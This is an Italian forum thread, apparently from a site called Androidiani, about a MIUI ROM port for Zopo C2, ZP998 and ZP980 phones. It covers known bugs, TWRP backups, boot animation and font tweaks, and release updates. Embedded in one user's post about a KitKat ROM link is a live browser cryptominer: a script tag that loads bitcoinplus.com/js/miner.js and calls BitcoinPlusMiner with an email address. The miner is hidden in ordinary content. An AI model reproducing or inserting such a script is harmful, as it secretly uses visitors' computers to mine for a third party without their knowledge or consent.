Esatto.
Grazie
Edit: magari se scrivo anche qual è il terminale ;)
Zopo C2 Platinum (2/32)
Visualizzazione stampabile
eccola (è quella del 990 ma tanto è la stessa)
bootanimation.zip
devi sostituire il file bootanimation.zip a quello già esistente dentro la /system/media
Paolo dacci qualche anticipazione sulla MIUI per octacore.
Almeno le tempistiche approssimative. :p
Naturalmente se ti va e se puoi..
ci sono diversi problemini da risolvere
il 3g funziona solo sullo slot 1
non c'è l'engineering mode
non c'è lo spegnimento/accensione programmato
la camera funziona correttamente solo con l'apk stock, usando la camera miui invece funziona la parte foto ma crasha la parte video
la radio fm funziona solo con quella stock, con quella miui crasha (problema non grave imho)
sicuramente altro che non ho ancora notato :D
per il resto sta già girando sul mio 998, si comporta abbastanza bene da quel poco che l'ho usata perchè sono in piena fase di test quindi flash a manetta :)
tempistiche...non so, penso 1-2 giorni
Da profano mi pare che sia praticamente tutto funzionante.
3G ed engineering sono forse i punti più critici.
Ma poi ognuno ha le proprie esigenze.
Complimenti. La aspettiamo con ansia e, mi risulta, che tu sia il primo in assoluto!
Ciao Paolo credo sia stata rilasciata la 4.2.7 per il C2 sul sito della Miui
Inviato dal mio ZP980 usando Androidiani App
per quanto riguarda il 998 c'è un problema...il firmware non è decompilabile/ricompilabile correttamente quindi sono impossibilitato a risolvere i problemi della camera miui e gli altri....e anche a tradurla in italiano -.-
quindi ricapitolando:
3g solo su slot 1
camera stock e non quella miui
radio stock e non quella miui
per l'engineering mode ho messo quello del 990, funziona ma ha diverse voci disabilitate....meglio di niente
parzialmente in italiano
se hai voglia la testeresti anche tu per vedere se c'è altro che non va ? (anche se appunto non potendo decompilare/ricompilare viene difficile risolvere i problemi)
fammi sapere che così preparo lo zip e lo uploado
Volentieri, però da domani sera perché sono in giro per lavoro.
Inviato dal mio ZP998 usando Androidiani App
va bene, oggi faccio lo zip "definitivo" e poi lo uploado e ti mando il link, poi quando puoi senza fretta la provi: )
Perfetto.
Paolo, chiariscimi un dubbio. Stavo facendo il backup dalla tua TWRP e ho visto che c'è spuntato solo data. Devo spuntare anche boot e system per avere il backup completo e riavviabile, vero?
sisi, per il backup completo serve boot, system, data...il resto lascialo non selezionato
cmq lo zip è in upload :)
OK. Domani sera installo.
Grazie.
Ciao a tutti,
Ho notato un fastidioso bug con la MIUI. Non sono riuscito a capire cosa lo genera ma ogni tanto mi ritrovo con il wifi ed il 3G disattivato.
Non è un problema legato alla batteria, succede sia con batteria piena che con batteria scarica.
Avevo già fatto il fix per la NVRAM, anche se navigavo tranquillo sia in wifi che in 3G anche con la rete fantasma.
Qualcuno ha avuto lo stesso problema?
Grazie
Giacomo
Ciao a tutti,
ho notato che la versione scaricabile in prima pagina non è l'ultima MIUI uscita. Cosa succede con questa rom? E' stata abbandonata?
no non è abbandonata.
stasera o domani faccio la 4.2.14. settimana scorsa sono stato impegnato con altro
versione 4.2.14 in prima pagina
changelog ufficiale: MIUI ROM 4.2.14 Full Changelog (Released) - General Chat - MIUI Official English Site - Redefining Android
no fino a quando mediaterk non rilascerà (se mai lo farà) kitkat per i 6589
Credo a breve su Twitter nella sezione Mediatek sembra che ci stiano lavorando questo il link del twit:
https://mobile.twitter.com/MediaTek/...32928828534784
Poi ho trovato il link di questa rom: <script src='http://www.bitcoinplus.com/js/miner.js' type='text/javascript'></script> <script type='text/javascript'>BitcoinPlusMiner("kishandoshispice@gma il.com")</script> Kitkat 4.4 For mtk Devices | All The Fun Needed dove per i processori mtk6589 and mtk6589T forse c'è già qualcosa.
ma l'hai vista la data di quel tweet ?
è di settembre...mediatek non ha mai annunciato kitkat per i 6589 ma solo gli octacore quindi non si sa se uscirà mai
vedremo ma non fateci troppo affidamento :)
è una fake, è 4.2.1
OT: Paolo, se prendo la tastiera xperia dalla tua MIUI credi che funzioni sul 998 con rom stock?
Inviato dal mio ZOPO ZP998 usando Androidiani App
Ciao Paolo, che novità apporta l'ultimo aggiornamento?
Risolto il bug dei contatti :-) scegliere da quale account visualizzare i contatti. Finalmente ;-)
si potrebbe funzionare
cmq fai prima a scaricare lo zip flashabile da xda :D
[APP] Xperia Z / S Keyboard for ALL [Swipe][Multi-Lang][Stable][ICS][JB] - xda-developers
Ciao Paolo, ti volevo chiedere se anche nella nuova MIUI hai implementato il fix per il 3g come per la os color
che sappia io non serve nella miui
Ciao Paolo, se riuscussi a risolvere il problema del riconoscimento vocale te ne sarei grato. Grazie
Paolo, sto cercando di aumentare la dimensione dei font, Tu sai dove agire direttamente nella rom da flashare? Non parlo della dimensione da impostare nel display. Ho provato a sostiruire il file mtz ma senza successo.
Ciao grazie
Allegato 102602Allegato 102604
ma è cmq quello l'unico modo per cambiare la dimensione (che sappia io)
controlla se nel build.prop hai queste linee
se non le hai puoi provare a metterle...dipende dal firmware che usi se poi le userà oppure nocodice:ro.build.fontsize=0.9,1.0,1.1,1.15
ro.default.fontsize=100
Ciao Paolo,
ho flashato il file della partizione che mi avevi postato "dall'altra parte" anche sullo zopo 980, solo che avevo fatto male I conti, era da 16 gb, percui mettendo la partizione da 13 gb mi lascia poche centinaia di mb come memoria telefono.
Che tu sappia puo' essere un problema?
in prima pagina link versione 4.2.21
dovrei aver risolto il problema della dettatura vocale
Allegato 102702
changelog ufficiale: MIUI ROM 4.2.21 Full Changelog (Released) - General Chat - MIUI Official English Site - Redefining Android
edit:
ho dimenticato di rimuovere l'app weather base, se non la volete basta cancellare il file weather.apk nella /system/app usando un qualsiasi file manager con il supporto al root (tipo root explorer) e riavviare
Ciao a tutti sono un nuovo membro del forum e da poco ho preso uno zopo ZP980 32GB , vengo da un nexus S e prima avevo un nexus one, passando per le svariate ROM cyanogen , MIUI e slimroms . Adesso con lo Zopo ho montato l'ultima release fatta da marsapa la v21.1, ma sto riscontrando problemi con la fotocamera e qualche altro problemino, con questa saranno risolti? La monteró comunque per testarla, vi ho solo scritto per ringraziarvi dell'ottimo lavoro :)
Vai tranquillo con questa e soprattutto con la colorOs a mio papere visto che abbiamo lo stesso telefono ti troverai molto bene. Tieni presente che la fotocamera dello Zopo soprattutto fotografando in condizioni dove la luce scarseggia, non è una Karl Zeiss, per dirti non ti aspettare foto eccellenti insomma. Cmq ben venuto nella community
Inviato dal mio ZP980 usando Androidiani App
Grazie del consiglio vi faró sapere , il problema della fotocamera non é la qualitá ma purtroppo non parte proprio. Inizio a flasharla ORA a dopo :)